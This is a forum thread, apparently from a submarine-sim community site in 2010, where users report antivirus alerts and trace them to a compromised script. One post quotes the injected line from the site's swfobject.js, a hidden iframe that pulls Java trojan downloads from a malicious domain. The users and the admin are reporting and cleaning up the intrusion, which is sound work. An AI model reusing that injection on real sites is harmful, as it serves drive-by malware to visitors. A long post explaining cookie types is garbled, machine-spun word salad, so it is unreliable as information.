java problem and more

[JScones]

I started getting this message this afternoon. Now it pops up everytime I touch this site, and ONLY this site.

[Gerald]

HTTP cookie or first-party session cookies. These ARE temporary cookies set by the web site-being visited (the first-party). Cleared-when browser is closed.First-party persistent cookies. These ARE permanent cookies set by the web site-being visited (the first-party). They Are Permanently stored and Will Be retained eller Batch Their Requested expiration date and time when, or Batch They Are Manually deleted through sometime user action.Third-party session cookies. These ARE temporary cookies are not set by the the first-party, But Rather village sometime other "Third-party" web server. Third-party persistent cookies. These ARE permanent cookies That ARE stored Permanently, They Will Be retained or Batch They Are Manually deleted through sometime user action. These Are The worst of all cookies, Since They Are Typically planted Into a user's browser Without the user's knowledge, permission, or expectation, after Which Time Do They cannabis and ers, Used to track users across the Internet Compiling profiles of sites visited, search queries Used, and collecting all Manner of staff and private information. Flash cookies = an Entirely Different form of "cookie," That Is Not wrist village browser settings (by normal 'cookie' protocol) That Must Be dealt with by Entirely Different methods.Advertisers (and Other unscrupulous parties) Have managed to trick your browser Into Revealing information about you & your surfing habits (and more) with These 3rd party cookies (and Lately "flash cookies).These Are The Ones That Many anti-malware scans turn up as 'spyware' or Worse. You Should always blocks These, as They Are Hardly ever Needed by anyone. Settings ARE usually set your browser's 'Privacy' section.

[HunterICX]

seems that the drerlre.co.cc is the culprit...will notify Neal about this.

thank you Seawolf & JScones for the reports

HunterICX

[Gerald]

Are usually seen in,
I looked at the scripts that were running, and someone snuck something into their /js/swfobject.js file:document.write('<iframe width=2 height=1 frameborder=0 src="http://drerlre.co.cc/zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza"></iframe>');

http://www.microsoft.com/security/po...ID=-2147328635

Use flashblock on almost every site,That redirects to a 404 now, and it looks like their swfobject.js has been fixed, but I'm assuming that was the culprit.

[Gerald]

Just as it is, a culprit!

[Rhodes]

Yep. got the same message on entering subsim again. I think that is to do with some of the advertising. I think is this, since I got portuguese adverts

"http://pagead2.googlesyndication.com...DIIr-5DB0kEKXo"

But nod says the the connection is terminated and so, possibly I am safe for the momment!

So vendor, I heard that you are buing the beers...

[Gerald]

Quote:

Originally Posted by Rhodes

Yep. got the same message on entering subsim again. I think that is to do with some of the advertising. I think is this, since I got portuguese adverts

"http://pagead2.googlesyndication.com...DIIr-5DB0kEKXo"

But nod says the the connection is terminated and so, possibly I am safe for the momment!

So vendor, I heard that you are buing the beers...

you need "only" fly from Lisbon to Funchal,

[Onkel Neal]

Ok, I have hired a server security expert to check the server thoroughly and see what's up.

[Dowly]

No problems on my end, both FF and Avast find nothing.

[Onkel Neal]

Ok, I have Scott setting up a full security check. I have not gotten any alerts from my Norton AV but when several people report this, I take it very seriously. Thanks! Will report back asap.

Neal

[SeaWolf U-57]

Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it

[SeaWolf U-57]

Quote:

Originally Posted by Rhodes

Ideed. But now, I opened this thread and got the same virus from the first time detected by nod32 and and java console pop up. But it's strange, subsim is not infected! I am not seeing any site apart from this.

PS: 29-09-2010 10:34:24 HTTP filter file http://drerlre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.
Its was this that appear!

Take a look in the Nod32 Quarantine folder you will see the files that tried to infect your machine thank god they weren’t opened.
My version of Nod32 also rejected the connection and install
Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it
I didn't see this thread so I opened this one

http://www.subsim.com/radioroom/showthread.php?t=175533

[stabiz]

My avast was going bonkers too, only the main page of subsim forums.

[SeaWolf U-57]

Its strange how some did and some didn’t I wonder if its something to do with the rotation of the adverts maybe only one is infected

[Gerald]

Quote:

Originally Posted by SeaWolf U-57

I Found this in my quarantine folder of Nod32it was never allowed to install


29/09/2010 …. drerlre.co.cc/client.zip… java/TrojanDownloader.agent.NBU trojan
29/09/2010 … drerlre .co.cc/1.zip ….. A variant of java/Mugade


(I removed the http:// to stop them being active links)


I connected using my Firefox browser

Edit ...... why did subsim ask for java to be installed in the first place ???

Java controls a crucial factor in the os, but if you add some add-on, and adjusts in configuring which sites you trust, then this is just a memory